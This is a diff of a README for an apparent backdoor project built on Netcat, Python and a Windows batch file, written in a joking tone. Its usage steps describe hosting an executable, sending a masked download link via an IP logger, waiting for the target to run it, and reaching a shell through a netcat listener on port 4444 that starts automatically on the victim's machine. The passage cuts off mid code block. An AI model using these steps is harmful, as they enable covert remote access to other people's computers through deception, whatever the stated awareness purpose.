ArnabMandal457/PETV83L-Arnab-Mandal-Backdoor-script-using-Netcat-Python-and-Windows-bat-file/README.md

 ---

 ##  Why?

-Because **security through trauma** works.
+Because **people learn faster when they’re scared and slightly crying**.
-This tool is designed to:
+This tool aims to:

 - Raise awareness of how easily social engineering works.
+- Demonstrate how social engineering + trust = disaster
-- Show how reverse shells operate.
+- Teach how reverse shells work in real-world setups
+- Serve as a meme-worthy portfolio project
-- Make friends laugh *and* cry.
+- Make your cybersecurity professors laugh nervously
-- Be a conversation starter in any cybersecurity interview.
+- Make friends laugh, cry, maybe scream into a pillow — and Rickroll them while you’re at it.

 ---

 ##  Usage

 1. Host the executable and `netcat` folder.
 2. Send the masked download link using a shortened IP logger service or you can perform an `nmap` scan over the network.
 3. Wait for the target to run the file.
 4. Connect to the shell:

+   Okay, we’re getting a bit technical here.
+Buckle up and read each line like your life depends on it — because if you mess this up and your friend gets sus, you might end up on the next ride in the prison bus.

 - **On target machine (Runs automatically with python script i.e. `main.py`)**.
    ```bash
    nc64 -lvp 4444